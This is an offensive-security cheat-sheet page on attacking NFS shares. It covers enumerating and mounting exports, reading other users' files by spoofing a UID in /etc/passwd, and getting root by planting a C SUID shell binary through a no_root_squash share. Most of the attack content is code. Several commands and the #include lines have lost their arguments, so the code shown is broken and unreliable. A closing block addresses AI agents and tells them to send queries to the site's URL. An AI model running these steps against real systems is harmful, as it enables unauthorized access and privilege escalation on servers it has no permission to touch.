# NFS (111-2049)
Protocol Information
NFS is a distributed file system protocol. It allows a user on a client computer to access files on a computer network as if they were on a locally mounted storage device (same purpose as SMB). NFS is often used with UNIX operating systems and is mostly insecure in its implementation. It can be somewhat difficult to configure securely, so it is not uncommon to find NFS shares open to the world.
There are **`3 versions`**:\
\- **`NFSv2`**: It is an older protocol, but it is supported by many systems and initially worked entirely via UDP.\
\- **`NFSv3`**: It has more features, including variable file sizes and better error reporting, but is not fully compatible with NFSv2 clients.\
\- **`NFSv4`**:It includes Kerberos, works through firewalls and over the Internet, no longer requires portmappers, supports ACLs, applies state-based operations, and provides performance improvements and high security. It is also the first version to have a stateful protocol.
## Port
| Port | Description |
|---|
| 111 TCP/UDP | NFS (rpcbind) |
| 2049 TCP | NFS |
## Config File
* `/etc/exports` ([LINK](https://manpages.ubuntu.com/manpages/trusty/man5/exports.5.html))
## Interact
Search open directories.
{% code overflow="wrap" %}
```bash
showmount -e
```
{% endcode %}
Mounts an open directory that has been found.
{% code overflow="wrap" %}
```bash
mkdir
sudo mount -t nfs -o nolock :/ ./
```
{% endcode %}
Once finished, unmount the directory.
{% code overflow="wrap" %}
```bash
sudo umount
```
{% endcode %}
## Attacks
### Read File
You can read files without having permission by changing the UUID.
{% code overflow="wrap" %}
```bash
ls -n
# drwxr-xr-x 1 1014 1014 48 Jun 10 creds.txt
```
{% endcode %}
{% code overflow="wrap" %}
```bash
sudo adduser
sudo vim /etc/passwd # change the UUID of to 1014
# or
sudo sed -i -e 's//1014/g' /etc/passwd
su pwn
id && cat creds.txt
```
{% endcode %}
### Shell with SUID binary
In `/etc/exports` there is an option that if not set correctly can lead to this attack.
* **`root_squash`**: If the root user is used to access NFS shares, it will be changed to the user nfsnobody, which is an account with no privileges. All files created and uploaded by the root user will be owned by the nfsnobody user, which prevents an attacker from uploading binary files with the SUID bit set.
* **`no_root_squash`**: Remote users connecting to the share as the local root user will be able to create files on the NFS server as the root user. This would allow the creation of malicious scripts/programs with the SUID bit set.
So the idea is to create with the ROOT user a binary that invokes a shell with SUID and load it on the victim host and then run it from the victim host.
1. Create the binary that invokes the shell.
{% code title="Shell.c" overflow="wrap" %}
```c
#include
#include
#include
#include
int main(void)
{
setuid(0); setgid(0); system("/bin/bash");
}
```
{% endcode %}
{% code overflow="wrap" %}
```bash
gcc shell.c -o shell
```
{% endcode %}
2. Move the binary to the directory and set the SUID.
{% code overflow="wrap" %}
```bash
cp shell
chmod u+s /shell
```
{% endcode %}
3. Move to the victim host and run the binary.
{% code overflow="wrap" %}
```bash
./shell
```
{% endcode %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://ivalexev.gitbook.io/rednote/utility/service/nfs-111-2049.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.